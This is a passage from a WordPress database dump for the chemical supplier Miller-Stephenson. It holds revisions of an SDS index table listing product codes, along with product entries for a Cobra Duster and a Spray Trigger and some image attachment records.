center;">EPIKURE 3055</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3115</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3140</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3223</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3234</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3245</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-110X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3253</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3270</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X-XP</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3271</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">H0805A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3274</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">J0912A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3282</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K0725A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3290</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K1016A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3295</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">CURING AGENT W</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K54</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K61B</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BDMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BF3-400</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">DEAPA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">NMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 115</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VERSAMID 140</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-09-20 13:58:51', '2016-09-20 13:58:51', '', 1842, 'https://132.148.10.86/wordpress/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1850, 2, '2016-09-20 13:59:06', '2016-09-20 13:59:06', '<h1>Miller-Stephenson SDS data base.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-992-2424 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-124H</td>\r\n<td style="text-align: center;">MS-111</td>\r\n<td style="text-align: center;">MS-122AD</td>\r\n<td style="text-align: center;">MS-452N</td>\r\n<td style="text-align: center;">AGL 683</td>\r\n<td style="text-align: center;">MS-900</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222L</td>\r\n<td style="text-align: center;">MS-114C</td>\r\n<td style="text-align: center;">MS-122AD RED</td>\r\n<td style="text-align: center;">MS-460H</td>\r\n<td style="text-align: center;">AT</td>\r\n<td style="text-align: center;">MS-905 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222N</td>\r\n<td style="text-align: center;">MS-115</td>\r\n<td style="text-align: center;">MS-122ADL</td>\r\n<td style="text-align: center;">MS-462H</td>\r\n<td style="text-align: center;">ATA</td>\r\n<td style="text-align: center;">MS-905 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222T</td>\r\n<td style="text-align: center;">MS-182SD</td>\r\n<td style="text-align: center;">MS-122AV</td>\r\n<td style="text-align: center;">MS-465C</td>\r\n<td style="text-align: center;">AUT 2A45</td>\r\n<td style="text-align: center;">MS-907 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-222F</td>\r\n<td style="text-align: center;">MS-126H</td>\r\n<td style="text-align: center;">MS-122E</td>\r\n<td style="text-align: center;">MS-467C</td>\r\n<td style="text-align: center;">AUT 523</td>\r\n<td style="text-align: center;">MS-907 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L</td>\r\n<td style="text-align: center;">MS-126HUV</td>\r\n<td style="text-align: center;">MS-122E RED</td>\r\n<td style="text-align: center;">MS-470C</td>\r\n<td style="text-align: center;">AUT 1045</td>\r\n<td style="text-align: center;">MS-908 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242L-AS</td>\r\n<td style="text-align: center;">MS-383A</td>\r\n<td style="text-align: center;">MS-122SE</td>\r\n<td style="text-align: center;">MS-472C</td>\r\n<td style="text-align: center;">AUT 2045</td>\r\n<td style="text-align: center;">MS-908 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N</td>\r\n<td style="text-align: center;">MS-383H</td>\r\n<td style="text-align: center;">MS-122SD</td>\r\n<td style="text-align: center;">MS-470S</td>\r\n<td style="text-align: center;">AUT 2245</td>\r\n<td style="text-align: center;">MS-910 Part A</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-242N-AS</td>\r\n<td style="text-align: center;">MS-383HUV</td>\r\n<td style="text-align: center;">MS-122XD</td>\r\n<td style="text-align: center;">MS-472S</td>\r\n<td style="text-align: center;">143 SERIES</td>\r\n<td style="text-align: center;">MS-910 Part B</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381H</td>\r\n<td style="text-align: center;">MS-252</td>\r\n<td style="text-align: center;">MS-132FE</td>\r\n<td style="text-align: center;">MS-475C</td>\r\n<td style="text-align: center;">GPL 10X SERIES</td>\r\n<td style="text-align: center;">HELOXY 48</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HM</td>\r\n<td style="text-align: center;">MS-257</td>\r\n<td style="text-align: center;">MS-136W</td>\r\n<td style="text-align: center;">MS-477C</td>\r\n<td style="text-align: center;">GPL 246</td>\r\n<td style="text-align: center;">HELOXY 61</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HUV</td>\r\n<td style="text-align: center;">MS-262</td>\r\n<td style="text-align: center;">MS-143AX</td>\r\n<td style="text-align: center;">G0831B</td>\r\n<td style="text-align: center;">GPL 255</td>\r\n<td style="text-align: center;">HELOXY 62</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HMUV</td>\r\n<td style="text-align: center;">MS-282</td>\r\n<td style="text-align: center;">MS-143E</td>\r\n<td style="text-align: center;">Y0110A</td>\r\n<td style="text-align: center;">157FS</td>\r\n<td style="text-align: center;">HELOXY 67</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HC</td>\r\n<td style="text-align: center;">MS-532</td>\r\n<td style="text-align: center;">MS-143E-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 20X SERIES</td>\r\n<td style="text-align: center;">HELOXY 68</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCM</td>\r\n<td style="text-align: center;">MS-539</td>\r\n<td style="text-align: center;">MS-143E-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 21X SERIES</td>\r\n<td style="text-align: center;">HELOXY 71</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCUV</td>\r\n<td style="text-align: center;">MS-552</td>\r\n<td style="text-align: center;">MS-143E-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 22X SERIES</td>\r\n<td style="text-align: center;">HELOXY 107</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-381HCMUV</td>\r\n<td style="text-align: center;">MS-557</td>\r\n<td style="text-align: center;">MS-143E-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 226FG, 227FG</td>\r\n<td style="text-align: center;">HELOXY 116</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250</td>\r\n<td style="text-align: center;">MS-562</td>\r\n<td style="text-align: center;">MS-143E BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">240 SERIES</td>\r\n<td style="text-align: center;">HELOXY 505</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250M</td>\r\n<td style="text-align: center;">MS-582</td>\r\n<td style="text-align: center;">MS-143E RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">250 SERIES</td>\r\n<td style="text-align: center;">BISPHENOL A-157</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-250SP</td>\r\n<td style="text-align: center;">MS-702</td>\r\n<td style="text-align: center;">MS-143H</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">280 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255</td>\r\n<td style="text-align: center;">MS-722</td>\r\n<td style="text-align: center;">MS-143H-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">283 SERIES</td>\r\n<td style="text-align: center;">EPON RESIN SU 8</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-255M</td>\r\n<td style="text-align: center;">MS-727</td>\r\n<td style="text-align: center;">MS-143H-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 29X SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 813</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260</td>\r\n<td style="text-align: center;">MS-732</td>\r\n<td style="text-align: center;">MS-143H-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 407</td>\r\n<td style="text-align: center;">EPON RESIN 815C</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-260M</td>\r\n<td style="text-align: center;">MS-739</td>\r\n<td style="text-align: center;">MS-143H-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EG 2000, 3000</td>\r\n<td style="text-align: center;">EPON RESIN 825</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-280</td>\r\n<td style="text-align: center;">MS-747</td>\r\n<td style="text-align: center;">MS-143H BLUE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">FPG SERIES</td>\r\n<td style="text-align: center;">EPON RESIN 826</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-530</td>\r\n<td style="text-align: center;">MS-752</td>\r\n<td style="text-align: center;">MS-143H RED</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 828</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-538</td>\r\n<td style="text-align: center;">MS-752U</td>\r\n<td style="text-align: center;">MS-143 TE</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LINEAR OIL</td>\r\n<td style="text-align: center;">EPON RESIN 830</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-550</td>\r\n<td style="text-align: center;">MS-757</td>\r\n<td style="text-align: center;">MS-143XD</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">LVP</td>\r\n<td style="text-align: center;">EPON RESIN 834</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-555</td>\r\n<td style="text-align: center;">MS-762</td>\r\n<td style="text-align: center;">MS-143XD-1</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8990</td>\r\n<td style="text-align: center;">EPON RESIN 862</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-560</td>\r\n<td style="text-align: center;">MS-767</td>\r\n<td style="text-align: center;">MS-143XD-2</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8906A</td>\r\n<td style="text-align: center;">EPON RESIN 872</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-580</td>\r\n<td style="text-align: center;">MS-772</td>\r\n<td style="text-align: center;">MS-143XD-2.5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8908</td>\r\n<td style="text-align: center;">EPON RESIN 1001F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700</td>\r\n<td style="text-align: center;">MS-777</td>\r\n<td style="text-align: center;">MS-143XD-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8950</td>\r\n<td style="text-align: center;">EPON RESIN 1002F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-700M</td>\r\n<td style="text-align: center;">MS-782</td>\r\n<td style="text-align: center;">MS-143XD-10</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT 8980</td>\r\n<td style="text-align: center;">EPON RESIN 1004F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720</td>\r\n<td style="text-align: center;">MS-787</td>\r\n<td style="text-align: center;">MS-145W</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">NRT GREASE</td>\r\n<td style="text-align: center;">EPON RESIN 1007F</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720M</td>\r\n<td style="text-align: center;">MS-797</td>\r\n<td style="text-align: center;">MS-145W-4</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OIL W/SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1031</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-720L</td>\r\n<td style="text-align: center;">MS-110XB</td>\r\n<td style="text-align: center;">MS-153BN</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE GREASE SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1050</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725</td>\r\n<td style="text-align: center;">MS-1010</td>\r\n<td style="text-align: center;">A0305B</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OILS</td>\r\n<td style="text-align: center;">EPON RESIN 1163</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-725M</td>\r\n<td style="text-align: center;">MS-2010</td>\r\n<td style="text-align: center;">K1206A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">TS4 SEALANT</td>\r\n<td style="text-align: center;">EPON RESIN 8021</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730</td>\r\n<td style="text-align: center;">MS-31XXMD</td>\r\n<td style="text-align: center;">Y0717A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID</td>\r\n<td style="text-align: center;">EPON RESIN 8132</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730M</td>\r\n<td style="text-align: center;">MS-32XXMD</td>\r\n<td style="text-align: center;">Vydax NRT 960</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID XP</td>\r\n<td style="text-align: center;">EPON RESIN 8280</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-730L</td>\r\n<td style="text-align: center;">X-P35</td>\r\n<td style="text-align: center;">RA/IPA-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-500AF</td>\r\n<td style="text-align: center;">EPON RESIN 8281</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738</td>\r\n<td style="text-align: center;">H0805B</td>\r\n<td style="text-align: center;">RA/IPA-15</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-OILS</td>\r\n<td style="text-align: center;">EPON RESIN 58005</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-738M</td>\r\n<td style="text-align: center;">H1112B</td>\r\n<td style="text-align: center;">DryFilm RA/IPA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-AC, ACX</td>\r\n<td style="text-align: center;">EPON RESIN 58034</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-745</td>\r\n<td style="text-align: center;">Vertrel SDG</td>\r\n<td style="text-align: center;">DryFilm RA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-BD, BDX, BDZ</td>\r\n<td style="text-align: center;">EPONEX 1510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750</td>\r\n<td style="text-align: center;">Vertrel SFR</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-S, SX, SZ</td>\r\n<td style="text-align: center;">EPI-REZ WD-510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-750M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 2E SERIES</td>\r\n<td style="text-align: center;">EPI-REZ 3522-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PCA,PRO,SG</td>\r\n<td style="text-align: center;">EPI-REZ 5003-W-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5520-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-755L</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5522-WY-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3015</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-760M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3046</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-765</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3055</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3115</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-770M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3140</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-775M</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-780M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3223</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3234</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-795M</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3245</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-110X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3253</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3270</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">MS-120X-XP</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3271</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">H0805A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3274</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">J0912A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3282</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K0725A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3290</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">K1016A</td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3295</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">CURING AGENT W</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K54</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K61B</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BDMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BF3-400</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">DEAPA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">NMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 115</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VERSAMID 140</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-09-20 13:59:06', '2016-09-20 13:59:06', '', 1842, 'https://132.148.10.86/wordpress/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1851, 2, '2016-09-20 14:45:23', '2016-09-20 14:45:23', '', 'Cobra® Duster', '<strong>MS-228 </strong>\r\n<br /><br />\r\nA patented aerosol accessory. When combined with the Aero-Duster®, the Cobra® Duster provides a powerful, non-contact, easy to use delivery system. Designed for critical and hard-to-reach areas on electronic, photographic and computer equipment.\r\n', 'publish', 'open', 'closed', '', 'cobra-duster', '', '', '2016-09-20 15:30:35', '2016-09-20 15:30:35', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1851', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1852, 2, '2016-09-20 14:51:00', '2016-09-20 14:51:00', '', 'Spray Trigger', '<strong>MS-224</strong>\r\n<br /><br />\r\nAn easy, reusable attachment to convert Miller-Stephenson products into an efficient spray system. Features full grip trigger with leverage action for effortless spraying.\r\n', 'publish', 'open', 'closed', '', 'spray-trigger', '', '', '2016-09-23 17:16:46', '2016-09-23 17:16:46', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1852', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1853, 2, '2016-09-20 15:29:43', '2016-09-20 15:29:43', '', 'cobra-brush', '', 'inherit', 'open', 'closed', '', 'cobra-brush', '', '', '2016-09-20 15:29:43', '2016-09-20 15:29:43', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/COBRA-BRUSH.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1854, 2, '2016-09-20 17:12:45', '2016-09-20 17:12:45', '', 'g0831b', '', 'inherit', 'open', 'closed', '', 'g0831b', '', '', '2016-09-20 17:12:45', '2016-09-20 17:12:45', '', 1722, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/G0831B.jpg', 0, 'attachment', 'image/jpeg', 0); 
